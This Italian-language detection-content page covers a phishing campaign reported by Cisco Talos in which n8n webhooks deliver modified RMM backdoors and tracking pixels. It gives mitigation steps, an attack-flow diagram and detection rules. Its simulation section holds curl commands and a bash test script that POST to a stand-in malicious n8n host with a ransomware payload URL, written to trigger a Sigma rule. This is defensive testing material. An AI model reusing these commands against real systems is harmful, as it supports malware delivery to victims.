Attori di Minacce Sfruttano n8n per Automatizzare Attacchi Guidati dall’IA
Segui 
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Gli attori delle minacce stanno sfruttando la piattaforma di automazione a basso codice n8n per distribuire payload malevoli e profilare i destinatari delle email. Incorporando URL webhook dannosi nei messaggi di phishing, possono consegnare file eseguibili o installer MSI che implementano strumenti di accesso remoto nei sistemi delle vittime. L’attività include anche l’uso di pixel di tracciamento invisibili che raccolgono informazioni sulle vittime non appena l’email viene aperta. Questa campagna evidenzia come un servizio legittimo di automazione dei flussi di lavoro possa essere riutilizzato per la distribuzione di malware senza richiedere credenziali rubate.
Indagine
Cisco Talos ha analizzato una serie di campagne di phishing osservate tra ottobre 2025 e marzo 2026 che si basavano su URL webhook n8n incorporati nei messaggi email. Gli esche utilizzavano falsi collegamenti OneDrive che mostravano prima un prompt CAPTCHA prima di servire un file .exe o MSI malevolo. Una volta eseguiti, i payload installavano versioni modificate degli strumenti RMM di Datto o ITarian e creavano attività pianificate per mantenere la persistenza. Talos ha anche riscontrato attività di fingerprinting attraverso tag di immagini che richiamavano URL webhook n8n contenenti identificatori specifici delle vittime.
Mitigazione
Le organizzazioni dovrebbero monitorare eventuali traffici in uscita insoliti verso domini correlati a n8n da sistemi che normalmente non utilizzerebbero servizi di automazione e ispezionare eventuali schemi sospetti di URL webhook. Gli URL che si risolvono in sottodomini sconosciuti di n8n.cloud dovrebbero essere bloccati o testati in un ambiente sandbox prima che si consenta l’accesso agli utenti. I controlli di sicurezza delle email dovrebbero essere regolati per rilevare contenuti HTML dannosi, flussi CAPTCHA falsi e pixel di tracciamento nascosti. Gli IOC pertinenti, inclusi URL webhook e hash di file malevoli, dovrebbero essere condivisi con piattaforme di intelligence sulle minacce e difensori interni.
Risposta
I team di sicurezza dovrebbero dare l’allerta sulla presenza di URL webhook n8n nel contenuto delle email o nella telemetria di rete e isolare eventuali host compromessi non appena viene confermata un’attività sospetta. Qualsiasi strumento RMM installato e le attività pianificate correlate dovrebbero essere rimosse, seguite da un’analisi forense per scoprire ulteriore persistenza o payload successivi. Le politiche di firewall e proxy dovrebbero essere aggiornate per limitare l’accesso agli endpoint n8n non autorizzati. Le organizzazioni dovrebbero anche completare un processo completo di condivisione degli IOC tra i team interni e i partner esterni fidati.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes action_phishing["<b>Azione</b> – <b>T1566 Phishing</b>: Gli attori delle minacce inviano email malevole contenenti URL webhook n8n per attirare le vittime.<br/><b>Descrizione</b>: I tentativi di phishing mirano a consegnare contenuti malevoli tramite email."] class action_phishing action tool_webhook["<b>Strumento</b> – <b>Nome</b>: n8n webhook<br/><b>Descrizione</b>: Endpoint web personalizzato utilizzato per consegnare i payload."] class tool_webhook tool action_user_execution["<b>Azione</b> – <b>T1204.001 User Execution: Malicious Link</b>: La vittima clicca sul link del webhook, causando la richiesta dell’URL da parte del browser.<br/><b>Descrizione</b>: L’utente interagisce con contenuti malevoli."] class action_user_execution action action_exfil_webhook1["<b>Azione</b> – <b>T1567.004 Exfiltration Over Webhook</b>: Il webhook ritorna una pagina HTML malevola con un CAPTCHA e distribuisce un payload (EXE o MSI) mentre serve pixel di tracciamento.<br/><b>Descrizione</b>: Utilizza un servizio web per consegnare ed esfiltrare dati."] class action_exfil_webhook1 action malware_payload_exe["<b>Malware</b> – <b>Nome</b>: Payload EXE/MSI<br/><b>Descrizione</b>: Eseguibile che esegue PowerShell per installare uno strumento RMM modificato."] class malware_payload_exe malware action_powershell["<b>Azione</b> – <b>T1059.001 PowerShell</b>: L’eseguibile scaricato esegue comandi PowerShell per configurare e installare lo strumento RMM modificato.<br/><b>Descrizione</b>: Interprete di comandi e scripting."] class action_powershell action malware_rmm["<b>Malware</b> – <b>Nome</b>: Backdoor RMM modificato<br/><b>Descrizione</b>: Strumento di monitoraggio e gestione remota usato per la persistenza."] class malware_rmm malware action_service_execution["<b>Azione</b> – <b>T1569.002 Service Execution</b>: Lo strumento RMM è installato come servizio Windows per la persistenza.<br/><b>Descrizione</b>: Esegue tramite un servizio di sistema."] class action_service_execution action action_scheduled_task["<b>Azione</b> – <b>T1053 Scheduled Task/Job</b>: Viene creata un’attività pianificata per garantire che lo strumento RMM venga eseguito in modo persistente.<br/><b>Descrizione</b>: Garantisce l’esecuzione ricorrente."] class action_scheduled_task action action_msi_execution["<b>Azione</b> – <b>T1218.007 Msiexec</b>: L’MSI malevolo viene eseguito tramite msiexec per distribuire la backdoor RMM.<br/><b>Descrizione</b>: Esecuzione di proxy binario di sistema."] class action_msi_execution action action_exfil_webhook2["<b>Azione</b> – <b>T1567.004 Exfiltration Over Webhook</b>: Il pixel di tracciamento invisibile carica il webhook per catturare eventi di apertura email e informazioni sui dispositivi per la ricognizione."] class action_exfil_webhook2 action %% Connections action_phishing –>|consegna| tool_webhook tool_webhook –>|attiva| action_user_execution action_user_execution –>|porta a| action_exfil_webhook1 action_exfil_webhook1 –>|consegna| malware_payload_exe malware_payload_exe –>|esegue| action_powershell action_powershell –>|installa| malware_rmm malware_rmm –>|persiste tramite| action_service_execution action_service_execution –>|crea| action_scheduled_task action_scheduled_task –>|supporta| action_msi_execution action_msi_execution –>|deploia| malware_rmm malware_rmm –>|comunica tramite| action_exfil_webhook2 "
Flusso di Attacco
Rilevamenti
Possibile File Malevolo con Doppia Estensione (via process_creation)
Visualizza
Tentativo di Esecuzione di Windows ITarian Endpoint Manager (via process_creation)
Visualizza
Software Alternativo di Accesso / Gestione Remota (via process_creation)
Visualizza
Possibile Infiltrazione / Esfiltrazione Dati / C2 tramite Servizi / Strumenti di Terze Parti (via proxy)
Visualizza
Possibile Infiltrazione / Esfiltrazione Dati / C2 tramite Servizi / Strumenti di Terze Parti (via dns)
Visualizza
IOC (HashSha256) per rilevare: L’incubo di n8n: come gli attori delle minacce stanno abusando dell’automazione dei flussi di lavoro con l’IA
Visualizza
Rileva richieste GET HTTP agli URL Webhook n8n [Proxy]
Visualizza
Rilevazione di Abuso di Webhook n8n per la Consegna di Malware e il Fingerprinting dei Dispositivi [Webserver]
Visualizza
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre‑volo di Telemetria e Baseline deve essere completato.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta attesa dalla logica di rilevamento.
-
Narrazione e Comandi di Attacco:
Un attaccante acquista un dominio di breve durata che punta a
n8n.cloud/webhook. Creano un workflow n8n malevolo che, una volta attivato, serve un payload ransomware. L’email di phishing contiene un link a una pagina di destinazione con una sfida CAPTCHA. La vittima risolve il CAPTCHA, che il JavaScript dell’attaccante inoltra come valoreCAPTCHA=solved123nel corpo di una richiesta POST all’webhook. Il webhook risponde con un downloader PowerShell che esegue il payload. Questo flusso genera una richiesta HTTP il cui URL contienen8n.cloud/webhookand il cui corpo contiene la stringaCAPTCHA, perfettamente corrispondente alla regola Sigma.# Step 1 – La vittima completa il CAPTCHA (simulato) CAPTCHA_TOKEN="solved123" # Step 2 – Crea la POST malevola che imita l'azione della vittima curl -X POST "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=https://malicious.example.com/ransomware.exe" -
Script di Test di Regressione:
#!/usr/bin/env bash set -euo pipefail # Variabili – adatta al tuo ambiente di test WEBHOOK_HOST="my.malicious-n8n.cloud" WEBHOOK_PATH="/webhook/malicious-workflow" CAPTCHA_TOKEN="solved123" PAYLOAD_URL="https://malicious.example.com/ransomware.exe" echo "[*] Simulazione di abuso di webhook n8n guidato da CAPTCHA..." curl -s -o /dev/null -w "%{http_code}n" -X POST "https://${WEBHOOK_HOST}${WEBHOOK_PATH}" -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "CAPTCHA=${CAPTCHA_TOKEN}" --data-urlencode "payload_url=${PAYLOAD_URL}" echo "[+] Simulazione completata. Verifica rilevamento in SIEM." -
Comandi di Pulizia:
# Se un vero webhook è stato creato per il test, eliminalo tramite l'interfaccia utente o l'API di n8n. # Esempio di chiamata API (sostituisci API_KEY e WORKFLOW_ID): curl -X DELETE "https://my.malicious-n8n.cloud/webhook/malicious-workflow" -H "Authorization: Bearer API_KEY" # Rimuovi eventuali file temporanei (nessuno creato in questo script) echo "[+] Pulizia completata."